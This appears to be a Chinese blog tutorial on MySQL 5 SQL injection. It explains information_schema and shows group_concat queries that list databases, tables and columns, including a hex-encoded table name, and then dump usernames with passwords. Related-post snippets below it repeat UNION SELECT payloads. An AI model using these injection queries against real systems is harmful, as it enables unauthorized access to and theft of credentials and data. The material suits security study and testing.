mysql 5注入中group_concat的使用

最新推荐文章于 2024-05-28 20:11:32 发布
最新推荐文章于 2024-05-28 20:11:32 发布
阅读量94 收藏
点赞数
文章标签: 数据库
本文详细介绍了MySQL中的information_schema结构,包括schemata、tables、columns表的存储信息,并探讨了如何利用这些信息进行注入攻击。通过构造特定的SQL查询语句,可以获取数据库系统的敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

mysql中的information_schema 结构用来存储数据库系统信息

information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表。 


| SCHEMATA ――>存储数据库名的,

|——>关键字段:SCHEMA_NAME,表示数据库名称


| TABLES ――>存储表名的

|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;

TABLE_NAME表示表的名称


| COLUMNS ――>存储字段名的

|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;

TABLE_NAME表示所属的表的名称

    COLUMN_NAME表示字段名


可以看到,我们只要通过注射点构造查询语句遍相关字段,就可以得到我们想要的信息了。

爆所有数据名


select group_concat(SCHEMA_NAME) from information_schema.schemata


得到当前库的所有表

select group_concat(table_name) from information_schema.tables where table_schema=database()


得到表中的字段名 将敏感的表进行16进制编码adminuser=0x61646D696E75736572

select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572



得到字段具体的值

select group_concat(username,0x3a,password) from adminuser
iteye_11341
关注
sql注入知识---基础函数及用法(mysql
尘玥的故事
01-23 593
最后要注意order by的原则,写在最前面的字段,他的优先级最高,也就是写法中第一个的字段名1的优先级最高,优先执行他的内容。以id分组,把price字段的值在同一行打印出来,逗号分隔(默认)1.asc 升序,可以省略,是数据库默认的排序方式。order by 3 以第3个字段去排序。是一个正整数,指定将从左边返回的字符数。可以通过limit函数来找到要查的数据。order by 判断有多少个字段。2.desc 降序,跟升序相反。字符串中最左边的长度字符。是要提取子字符串的字符串。函数返回一个空字符串。
concat mysql sql注入_MySQL注入总结
weixin_32572129的博客
01-12 762
01 MySQL数据库结构及常用函数一、MySQL数据库结构MySQL数据库采用库=>表=>列=>数据的存储结构,这样的存储结构影响着我们后续的注入过程。1. MySQL内置库在MySQL(版本>=5.7)中除了用户自建的如admin等数据库,还有一些MySQL自带的数据库,这些数据库中存储着MySQL的关键信息:库名功能mysql保存有账户信息、权限信息、存储过程等sys...
concat mysql sql注入_Mysql数据库使用concat函数执行SQL注入查询
weixin_33304597的博客
12-29 179
SQL注入语句有时候会使用替换查询技术,就是让原有的查询语句查不到结果出错,而让自己构造的查询语句执行,并把执行结果代替原有查询语句查询结果显示出来。例如:原本查询语句是复制代码 代码如下:select username,email,content from test_table where user_id=uid;其中uid,是用户输入的。正常显示结果会出现用户名,用户邮箱,用户留言内容。但是如...
mysql 暴库 group_concat(),mysql 5注入group_concat使用
weixin_32645721的博客
03-17 225
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
sql注入利用group_concat函数
m0_70638961的博客
05-28 797
这里我使用的是sqllab-less1,通过对数据库的查询,我们发现数据库表名,列名,等数据在information_schema数据库中。但是这样只能回显某一个表,这时就可以使用group_concat函数把security的每一个表回显出来。首先根据group by指定的列进行分组,将同一组的列显示出来,并且用分隔符分隔。这里我们选择users表回显出用户名username和密码password。当库名、表名、列名都查到了之后,选择最有用的回显出来就成功的注入了。当然这是最简单的注入
[20][03][39] MySQL 注入concat/concat_ws/group_concat 函数详解
安全新司机
08-26 632
[TOC] 本文中使用的例子均在下面的数据库表 t_subject 下执行 1. concat() 函数 1.1 功能 将多个字符串连接成一个字符串 1.2 语法 concat(str1, str2, ...) 返回结果为连接参数产生的字符串,如果有任何一个参数为 null,则返回值为 null 1.3 举例 例 1 select concat (id, name, score) as info from t_subject; 中间有一行为 null 是因为 t_subject 表中有一行的 s
MySQL concat里面使用多个单引号,三引号的问题
09-08
MySQL中,`CONCAT`函数用于将两个或更多的字符串连接成一个字符串。当你在`CONCAT`中处理包含单引号或者三引号的字符串时,需要特别注意如何正确地表示它们,以避免语法错误。 1. **单引号的使用**: 在SQL中,...
达梦自定义函数group_concat内部使用wm_concat
最新发布
05-10
在达梦数据库中,由于其本身并不完全支持 MySQL 中的 `GROUP_CONCAT` 函数,因此可以通过创建自定义函数来模拟该功能的行为。以下是具体的实现方式: #### 方法一:基于 `WM_CONCAT` 创建自定义函数 可以利用达梦...
group_concat
02-28
`GROUP_CONCAT()` 是 MySQL 中用于将多行记录合并成单个字符串的一个聚合函数。其基本语法如下: ```sql GROUP_CONCAT( [DISTINCT] 要连接的字段 [ORDER BY 排序字段 ASC/DESC] [SEPARATOR '分隔符'] ) ``` ...
解释代码:select group_concat(schema_name) from information_schema.schema
04-25
好的,我现在要解决用户的问题,即如何使用SQL的group_concat函数从information_schema.schemata表中获取schema_name的连接字符串。首先,我需要回忆用户之前的问题和之前的回答,以保持连贯性。用户之前询问了关于...
less 函数_sqli-labs注入超详细版(less-1)
weixin_39710251的博客
11-26 197
sql注入是一个很重要安全漏洞,之前学的总是摸棱两可,后来再渗透过程中,经常遇到需要手工注入的情况,这次就从头到尾再做一次,结合mysql数据库一起讲解,希望能给大家带来帮助,顺便自己再一次学习。less-1 是字符注入,提示我们提交一个id试试在url中加入?id=1 正常显示出id为1的账号信息。此时数据库查询语句大概是这样id是字符型(这是我本地新建的模拟数据,不是sqli-la...
SQL注入group_concat()函数是否需要使用
Firebasky的博客
07-28 2032
我们在SQL注入的过程中,到底需不需要使用group_concat()函数? 今天在做buuctf里面的一道SQL注入的题是发现了这个问题,于是自己来记录一下。 也为了分享知识!!! 进入正题: 要弄清楚这个问题我们就需要了解group_concat()函数的作用 参考链接group_concat()函数讲解 上面说的非常清楚 总结来说就是将数据放在一起。 下面放一张自己的实验照片。方便理解。 好了现在我们知道了这个函数的作用。我们就来看看SQL注入的语句。 假如有下面的注入语句。查询password数据
MySql常用函数之 group_concat()、group by、count()、case when then、unin all、instr()、find_in_set()等使用介绍
热门推荐
hkl_Forever的博客
05-12 4万+
可见主与从表关系为一对多,而查询列中的 count() 中根据从表中的条件来判断是否统计入该条数据,符合条件的话返回给 count() 统计依据列,不符合条件返回给 count() 统计依据为 null(默认null不统计)在mysql的关联查询或子查询中,函数 group_concat(arg) 可以合并多行的某列(或多列)数据为一行,默认以逗号分隔。从输出结果可以看出,find_in_set() 函数是精准匹配的意思,2,11 这项集合中匹配不到 1 所以没有查询出来此项,符合预期。
详解union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘ ‘--+
m0_51756263的博客
07-10 8830
详解union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
SQL注入group_concat的学习笔记
kofi的博客,已停更
04-07 1490
<link rel="stylesheet" href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_views-b5506197d8.css"> <div id="content_views" class="markdown_views prism-atom-one-dark"> <svg xmlns="ht...
SQL注入MYSQL注入
av11566的博客
04-19 7465
前言 MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
SQL注入心得
A9874564的博客
02-21 1090
1.union 联合查询 查询当前数据库名 报错的语法(如and1=2)+ union select 1,database() 查询当前数据库版本 union select 1,version() 查询当前数据库 表名 1.union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 2.查询当前数据库所有表,并且拼接在一行显示 union select 1,group_co.
mysql--group_concat()
m0_46093829的博客
05-27 149
转自:https://www.geeksforgeeks.org/mysql-group_concat-function/ 一、GROUP_CONCAT()函数 GROUP_CONCAT函数返回一个字符串结果,该结果由分组中的值连接组合而成。 1、使用语法及特点: SELECT col1, col2, ..., colN GROUP_CONCAT ( [DISTINCT] col_name1 [ORDER BY clause] [SEPARATOR str_val] ) FROM tab.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值